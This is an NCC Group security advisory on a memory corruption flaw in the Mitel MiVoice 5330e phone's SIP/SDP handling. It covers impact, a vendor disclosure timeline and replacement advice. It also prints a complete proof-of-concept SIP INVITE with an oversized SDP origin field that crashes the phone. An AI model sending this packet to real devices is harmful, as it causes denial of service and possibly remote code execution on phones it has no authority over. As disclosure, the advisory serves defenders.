Technical Advisory: Mitel MiVoice 5330e Memory Corruption Flaw

Vendor: Mitel Vendor URL: Versions affected: 5330e IP Phone Systems Affected: Mitel MiVoice Author: Mattia Reggiani mattia.reggiani[at]nccgroup[dot]trust Advisory URL:
CVE Identifier: Risk: Low-High (case dependent) – Denial of Service and possible Remote Code Execution


The Mitel MiVoice 5330e VoIP device is affected by a memory corruption flaw in the SIP/SDP packet handling functionality. An attacker can exploit this issue remotely, by sending a particular pattern of SIP/SDP packets, to cause a denial of service state in the affected devices and possibly remote code execution.


SIP/SDP packet handling functionality.


Denial of service and potential remote code execution


The following SIP/SDP packets was used to trigger the memory corruption condition:

<- SNIP -> INVITE sip:7301@ SIP/2.0 Via: SIP/2.0/UDP;rport;branch=branchyPStYido2t Max-Forwards: 70 From: "7302"<sip:7302@>;tag=IKdO1hnVEu To: <sip:7301@> Call-ID: calljkhWCVlITROWK9o0NVsJCEQ0VxWMGz@ CSeq: 13100 INVITE Contact: <sip:7302@> User-Agent: Test Agent Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, NOTIFY, MESSAGE, SUBSCRIBE, INFO Accept: application/sdp Content-Type: application/sdp Content-Length: 1086  v=0 o=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 0 0 IN IP4 s=-  c=IN IP4 t=0 0 m=audio 16782 RTP/AVP 0 a=rtpmap:0 PCM/8000 a=extmap:1 urn:ietf:params:rtp-hdrext:csrc-audio-level a=extmap:2 urn:ietf:params:rtp-hdrext:ssrc-audio-level a=rtcp-xr:voip-metrics m=video 16541 RTP/AVP 96 99 a=recvonly a=rtpmap:96 H264/90000 a={inj[28]}:96 profile-level-id=4DE01f;packetization-mode=1 a=imageattr:96 send * recv [x=[0-1366],y=[0-768]] a=rtpmap:99 H264/90000 a=fmtp:99 profile-level-id=4DE01f a=imageattr:99 send * recv [x=[0-1366],y=[0-768]]  SIP/2.0 400 Bad Request Via: SIP/2.0/UDP;rport;branch=branchyPStYido2t From:"7302" <sip:7302@>;tag=IKdO1hnVEu To:<sip:7301@>;tag=5b33b7f1-3ac-2f1e08b1 CSeq:13100 INVITE User-Agent:Mitel-5330e-SIP-Phone 08000FBFA477 Call-ID:calljkhWCVlITROWK9o0NVsJCEQ0VxWMGz@ Content-Length:0 <- SNIP -> 

As shown in the following screenshot, a denial of service condition was triggered:

Figure 1 – Triggering memory corruption condition



According to the vendor, the Mitel 5330 phone has been superseded by Mitel 68xx series phones, therefore it is recommend to replace the affected device with the new version.

After a further investigation, the vendor released the public advisory with mitigation and recommended actions (

Vendor Communication

2018-07-16 Advisory reported to Mitel 2018-07-16 Mitel acknowledgement 2018-07-17 Details provided 2018-07-30 Mitel did not plan any mitigation since the affected version has been superseded by a new series of phones 2018-08-10 Mitel agreed for publishing the advisory
2018-09-25 Mitel released Product Security Advisory 18-0009

About NCC Group

NCC Group is a global expert in cyber security and risk mitigation, working with businesses to protect their brand, value and reputation against the ever-evolving threat landscape. With our knowledge, experience and global footprint, we are best placed to help businesses identify, assess, mitigate respond to the risks they face. We are passionate about making the Internet safer and revolutionising the way in which organisations think about cyber security.

Written by:  Mattia Reggiani

Call us before you need us.

Our experts will help you.

Get in touch
%d bloggers like this: